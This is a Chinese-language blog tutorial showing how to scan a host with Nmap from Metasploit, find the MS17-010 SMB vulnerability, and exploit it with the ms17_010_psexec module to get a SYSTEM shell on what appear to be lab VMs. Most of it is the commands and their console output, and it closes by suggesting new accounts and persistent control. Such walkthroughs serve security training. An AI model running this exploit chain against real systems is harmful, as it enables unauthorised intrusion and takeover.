文章详情
利用Metasploit+Nmap进行渗透网络服务器,直接获取管理权限
日期:2019/12/8 2:04:52
Metasploit这个强大的渗透工具,在这里我就不做过多介绍了,还有Nmap也是一个强大端口扫描工具,在黑客界里无人不知无人不晓,本次主要讲解,这两款工具结合使用,废话不扯,直接进入正题。
第一步:利用Nmap扫描
msf5 > db_nmap --script=vuln 192.168.41.143 [*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:25 CST [*] Nmap: Nmap scan report for 192.168.41.143 [*] Nmap: Host is up (0.00055s latency). [*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered [*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware) [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds msf5 > db_nmap --script=vuln 192.168.41.143 [*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST [*] Nmap: Nmap scan report for 192.168.41.143 [*] Nmap: Host is up (0.00076s latency). [*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered [*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware) [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds msf5 > db_nmap --script=vuln 192.168.41.142 [*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST [*] Nmap: Nmap scan report for 192.168.41.142 [*] Nmap: Host is up (0.00044s latency). [*] Nmap: Not shown: 997 closed ports [*] Nmap: PORT STATE SERVICE [*] Nmap: 135/tcp open msrpc [*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 445/tcp open microsoft-ds [*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware) [*] Nmap: Host script results: [*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED [*] Nmap: |_smb-vuln-ms10-054: false [*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) [*] Nmap: | smb-vuln-ms17-010: [*] Nmap: | VULNERABLE: [*] Nmap: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) [*] Nmap: | State: VULNERABLE [*] Nmap: | IDs: CVE:CVE-2017-0143 [*] Nmap: | Risk factor: HIGH [*] Nmap: | A critical remote code execution vulnerability exists in Microsoft SMBv1 [*] Nmap: | servers (ms17-010). [*] Nmap: | [*] Nmap: | Disclosure date: 2017-03-14 [*] Nmap: | References: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 [*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx [*] Nmap: |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
看到扫描结果,我们可以看出来,有几个可以了利用漏洞,开发445端口是存在smb的,我们随便利用一个漏洞来进行渗透攻击。
第二步:利用Metasploit查询对应的漏洞模块
首先我们输入命令:search ms17-010 查询有没有对应的漏洞模块,
msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
显示结果是有对应漏洞模块的,ms17 指的是2017年出现的漏洞,有对应漏洞那就好办了,下面三个我们随便选一个出来,我这里选最后一个来进一步渗透攻击。
第三步:选择对应攻击模块
由于不能截完整图,我附代码
msf5 > use exploit/windows/smb/ms17_010_psexec msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp payload => windows/shell_bind_tcp msf5 exploit(windows/smb/ms17_010_psexec) > show options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload options (windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Automatic
不清楚仔细看图,首先我们要命令:
showoptions
查看需要做哪些配置,当然攻击目标服务器ip设置上去,配置好之后万事俱备
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.41.142 RHOSTS => 192.168.41.142 msf5 exploit(windows/smb/ms17_010_psexec) >
到这里已经全部配置好,接下来有点激动,迫不及待发出进攻号令发动进攻,进攻号令:exploit
msf5 exploit(windows/smb/ms17_010_psexec) > exploit [*] 192.168.41.142:445 - Target OS: Windows 5.1 [*] 192.168.41.142:445 - Filling barrel with fish... done [*] 192.168.41.142:445 - <---------------- | Entering Danger Zone | ----------------> [*] 192.168.41.142:445 - [*] Preparing dynamite... [*] 192.168.41.142:445 - [*] Trying stick 1 (x86)...Boom! [*] 192.168.41.142:445 - [+] Successfully Leaked Transaction! [*] 192.168.41.142:445 - [+] Successfully caught Fish-in-a-barrel [*] 192.168.41.142:445 - <---------------- | Leaving Danger Zone | ----------------> [*] 192.168.41.142:445 - Reading from CONNECTION struct at: 0x821e58b0 [*] 192.168.41.142:445 - Built a write-what-where primitive... [+] 192.168.41.142:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.41.142:445 - Selecting native target [*] 192.168.41.142:445 - Uploading payload... uIppviFQ.exe [*] 192.168.41.142:445 - Created \uIppviFQ.exe... [+] 192.168.41.142:445 - Service started successfully... [*] 192.168.41.142:445 - Deleting \uIppviFQ.exe... [*] Started bind TCP handler against 192.168.41.142:4444 [*] Command shell session 1 opened (192.168.41.128:33767 -> 192.168.41.142:4444) at 2019-08-24 01:41:00 +0800
看到现在已经对445端口进军了
在后面我们可以看出来,成功入侵并且反弹一个shell,
现在成功拿下这台服务器系统权限,看网络连接情况,已经成功链接,拿到cmd权限可以这这台服务器实施控制,比如我们创建系统账号提权,对这台服务器做持久控制,好了今天就到这里,谢谢大家。
下一文章:csrf攻击原理及攻击流程实例演示
相关推荐
- 05-29如何下载官方正版window系统
- 01-15程序员最低学历要求,程序员要求什么学历?
- 12-20PHP代码审计入门篇bluecms
- 05-10美国宣布进入国家紧急状态(因燃油管道商遭遇
- 05-23键位与字根你了解多少?
- 09-09什么是XXE漏洞?XXE漏洞原理分析
- 01-11渗透测试前十培训机构有哪些?渗透测试培训机
- 06-10在线视频播放问题轻松解决,快来看看吧!
- 05-02少儿编程课有必要学吗?孩子学编程课有用吗
- 03-28当黑客容易吗?黑客技术容易学吗?
- 09-20web安全检测工具有哪些,web漏洞检测工具
- 06-03怎么样可以加快手机的运行速度?
- 03-21解析qq盗号网站的多种盗号方式
- 02-21看黑客是如何获取你电脑最高权限的,shell提